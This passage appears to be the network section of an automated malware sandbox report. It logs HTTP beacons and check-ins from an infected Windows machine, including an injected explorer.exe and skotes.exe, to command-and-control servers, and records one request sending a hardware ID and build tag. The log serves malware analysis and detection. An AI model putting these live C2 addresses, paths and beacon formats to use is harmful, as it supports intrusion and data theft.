                                                                                                                                                                                                                                                                                        Content-Type: text/plain
                                                                                                                                                                                                                                                                                        Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                        Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                                                                        Data Ascii: success
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:51:10.627526045 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:51:10.943296909 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                        Content-Length: 8
                                                                                                                                                                                                                                                                                        Via: 1.1 google
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 04:09:04 GMT
                                                                                                                                                                                                                                                                                        Age: 42126
                                                                                                                                                                                                                                                                                        Content-Type: text/plain
                                                                                                                                                                                                                                                                                        Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                        Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                                                                        Data Ascii: success


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        124192.168.2.1050243185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:28.200229883 CET283OUTPOST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:28.320557117 CET6OUTData Raw: 45 5b 58 05
                                                                                                                                                                                                                                                                                        Data Ascii: E[X
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:29.930138111 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 23:50:28 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        125192.168.2.1050253185.215.113.43807820C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:30.054193974 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                        Host: 185.215.113.43
                                                                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:31.384952068 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:50:31 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: 1 0


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        126192.168.2.1050254185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:30.171413898 CET283OUTPOST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:30.297075987 CET6OUTData Raw: 45 5b 58 05
                                                                                                                                                                                                                                                                                        Data Ascii: E[X
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:31.769669056 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 23:50:30 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        127192.168.2.1050255185.215.113.20680
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:30.416608095 CET90OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.215.113.206
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:31.745748997 CET203INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:50:31 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:31.829932928 CET413OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----HDGIJJDGCBKFIDHIEBKE
                                                                                                                                                                                                                                                                                        Host: 185.215.113.206
                                                                                                                                                                                                                                                                                        Content-Length: 211
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Data Raw: 2d 2d 2d 2d 2d 2d 48 44 47 49 4a 4a 44 47 43 42 4b 46 49 44 48 49 45 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 44 42 33 41 36 39 44 41 41 36 45 32 33 37 31 35 34 33 35 31 30 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 49 4a 4a 44 47 43 42 4b 46 49 44 48 49 45 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 49 4a 4a 44 47 43 42 4b 46 49 44 48 49 45 42 4b 45 2d 2d 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: ------HDGIJJDGCBKFIDHIEBKEContent-Disposition: form-data; name="hwid"2DB3A69DAA6E2371543510------HDGIJJDGCBKFIDHIEBKEContent-Disposition: form-data; name="build"stok------HDGIJJDGCBKFIDHIEBKE--
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:32.280467033 CET210INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:50:32 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                        Content-Length: 8
                                                                                                                                                                                                                                                                                        Keep-Alive: timeout=5, max=99
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Data Raw: 59 6d 78 76 59 32 73 3d
                                                                                                                                                                                                                                                                                        Data Ascii: YmxvY2s=


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        128192.168.2.1050258185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:32.045134068 CET283OUTPOST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:32.183845043 CET6OUTData Raw: 45 5b 58 05
                                                                                                                                                                                                                                                                                        Data Ascii: E[X
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:33.682008028 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 23:50:32 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        129192.168.2.1050260185.215.113.43807820C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:33.113879919 CET306OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                        Host: 185.215.113.43
                                                                                                                                                                                                                                                                                        Content-Length: 152
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 45 37 37 42 30 35 42 38 32 44 31 32 46 43 30 37 44 42 32 33 39 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39
                                                                                                                                                                                                                                                                                        Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B12E77B05B82D12FC07DB239B96DA0445166EF7A7D35B1E750864299
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:34.452907085 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:50:34 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        130192.168.2.1050261185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:33.937956095 CET283OUTPOST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:34.064095974 CET6OUTData Raw: 45 5b 58 05
                                                                                                                                                                                                                                                                                        Data Ascii: E[X
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:35.507217884 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 23:50:34 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        131192.168.2.1050265185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:35.754877090 CET283OUTPOST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:35.876600027 CET6OUTData Raw: 45 5b 58 05
                                                                                                                                                                                                                                                                                        Data Ascii: E[X
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:37.387463093 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 23:50:36 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        132192.168.2.1050266185.215.113.43807820C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:36.619726896 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                        Host: 185.215.113.43
                                                                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:37.956245899 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:50:37 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: 1 0


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        133192.168.2.1050268185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:37.629914045 CET283OUTPOST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:37.750818968 CET6OUTData Raw: 45 5b 58 05
                                                                                                                                                                                                                                                                                        Data Ascii: E[X
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:39.326740980 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 23:50:38 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        134192.168.2.1050272185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:39.583461046 CET283OUTPOST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:39.704101086 CET6OUTData Raw: 45 5b 58 05
                                                                                                                                                                                                                                                                                        Data Ascii: E[X
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:41.219197035 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 23:50:40 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        135192.168.2.1050273185.215.113.43807820C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:39.676470995 CET306OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                        Host: 185.215.113.43
                                                                                                                                                                                                                                                                                        Content-Length: 152
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 45 37 37 42 30 35 42 38 32 44 31 32 46 43 30 37 44 42 32 33 39 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39
                                                                                                                                                                                                                                                                                        Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B12E77B05B82D12FC07DB239B96DA0445166EF7A7D35B1E750864299
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:41.013376951 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:50:40 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        136192.168.2.1050275185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:41.460043907 CET283OUTPOST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:41.581305981 CET6OUTData Raw: 45 5b 58 05
                                                                                                                                                                                                                                                                                        Data Ascii: E[X
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:43.192471027 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 23:50:42 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        137192.168.2.1050287185.215.113.43807820C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:43.415031910 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                        Host: 185.215.113.43
                                                                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:44.557986975 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:50:44 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: 1 0


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        138192.168.2.1050288185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:43.454822063 CET283OUTPOST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:43.584964037 CET6OUTData Raw: 45 5b 58 05
                                                                                                                                                                                                                                                                                        Data Ascii: E[X
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:44.962646961 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 23:50:44 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        139192.168.2.1050294185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:45.220479012 CET283OUTPOST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                                                                                        Connection: close
